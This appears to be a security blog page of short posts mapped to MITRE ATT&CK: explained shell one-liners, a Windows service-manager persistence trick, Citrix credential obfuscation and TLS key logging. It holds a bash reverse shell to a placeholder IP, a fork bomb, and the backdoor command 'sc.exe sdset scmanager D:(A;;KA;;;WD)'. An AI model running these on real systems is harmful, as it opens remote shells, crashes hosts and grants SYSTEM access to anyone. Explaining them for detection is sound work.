Mini/Reverse/Web-Shells explained

The website explainshell.com explains Mini/Reverse/Web-Shells (T1505.003): 

• Example 1: https://explainshell.com/explain?cmd=file%3D%24%28echo%20%60basename%20%22%24file%22%60%29 
• Example 2: https://explainshell.com/explain?cmd=for%20user%20in%20%24%28cut%20-f1%20-d%3A%20/etc/passwd%29%3B%20do%20crontab%20-u%20%24user%20-l%202%3E/dev/null%3B%20done 
• Example 3: https://explainshell.com/explain?cmd=%3A%28%29%7B%20%3A%7C%3A%26%20%7D%3B%3A# 
• Example 4: https://explainshell.com/explain?cmd=bash+-i+%3E%26+%2Fdev%2Ftcp%2F10.0.0.1%2F4242+0%3E%261

More examples:

• :(){ :|:& };:
• for user in $(cut -f1 -d: /etc/passwd); do crontab -u $user -l 2>/dev/null; done
• file=$(echo `basename "$file"`)
• true && { echo success; } || { echo failed; }
• cut -d ' ' -f 1 /var/log/apache2/access_logs | uniq -c | sort -n
• tar zcf - some-dir | ssh some-server "cd /; tar xvzf -"
• tar xzvf archive.tar.gz
• find . -type f -print0
• ssh -i keyfile -f -N -L 1234:www.google.com:80 host
• git log --graph --abbrev-commit --pretty=oneline origin..mybranch

Windows fileless persistence local privilege escalation using sc.exe sdset

Alh4zr3d and Grzegorz Tworek wrote about a fileless, local privilege escalation backdoor in order to gain persistence (TA0003) using the following Windows command:

sc.exe sdset scmanager D:(A;;KA;;;WD) 

Setting the security descriptor on the service manager allows anyone to start SYSTEM services.

To show the security descriptor of service manager:

sc.exe sdshow scmanager

 

The Mitre Att&ck framework has technique T1569.002 for this "System Services: Service Execution", writing: "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services. The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net."

Microsofts own documentation about sc.exe sdset:

Sets a service's security descriptor, using the Service Descriptor Definition Language (SDDL).

Syntax

sc [<ServerName>] sdset <ServiceName> <ServiceSecurityDescriptor>

Parameters

Parameter	Description
<ServerName>	Specifies the name of the remote server on which the service is located. The name must use the Universal Naming Convention (UNC) format (for example, \\myserver). To run SC.exe locally, omit this parameter.
<ServiceName>	Specifies the service name returned by the getkeyname operation.
<ServiceSecurityDescriptor>	Specifies the service descriptor in SDDL.
/?	Displays help at the command prompt.

To explain the DACL D:(A;;KA;;;WD) gav_gall asked ChatGPT to explain:

Mitre Att&ck Micro Emulations - Test your own security

It is a very good idea to test your own IT-security systems and processes, if they detect something and what level of detail they provide. Mitre Engenuity launched a new project called: Micro Emulation

On GitHub version 4 was already released providing the first set of tools, which contains ActiveDirectory Enumeration, FileAccess, NamedPipes, ProcessInjection, UserExecution ISOBypass, Marcos and Shortcuts, WebShells, WindowsRegistry: https://github.com/center-for-threat-informed-defense/adversary_emulation_library/releases .

Citrix ICA SSO saved credentials in XOR obfuscated readable storage

The Citrix ICA application stores user credentials for its SingleSignOn SSO functionality in readable form using XOR obfuscation with the key „C“, as Benjam Delpy wrote: https://twitter.com/gentilkiwi/status/1570525137962930176

Mimikatz version 3 will be able to reveal this as shown in the following GIF with Windows 11 and Credential Guard enabled: https://video.twimg.com/tweet_video/Fcudz49XoAAfNHO.mp4

Video in higher quality

Decrypt TLS sessions of Chrome & Firefox

How to decrypt TLS Sessions of browsers like Chrome and Firefox without Man-in-the-Middle MitM/Adversary-in-the-Middle AitM (Att&ck T1557) like ARP Cache Poisoning, DNS Spoofing, LLMNR/NBT-NS Poisoning and SMB Relay, DHCP Spoofing, Proxy, burp, PAC, WPAD, etc:

This is a silent way to debug issues. However your EDR/SIEM/logings solution should check for SSLKEYLOGFILE entries in your environment variables because this is a silent way to break TLS without informing the user.

Use the SSLKEYLOGFILE in your environmentvariables of your windows, linux or macos system.

Windows

Simply create an environmentvariable called SSLKEYLOGFILE and set the value of the path to the text-file, in which the TLS private keys should be saved:

Linux

Simply create an environmentvariable called SSLKEYLOGFILE and set the value of the path to the text-file, in which the TLS private keys should be saved:

export SSLKEYLOGFILE=$HOME/tlsprivatekeys.txt

Decrypt TLS sessions with Wireshark

1. Open the wireshark prefecenses
2. Go to TLS 
3. Select your SSLKEYLOGFILE text file as (Pre)-Master-Secret filename as shown in the following screenshot: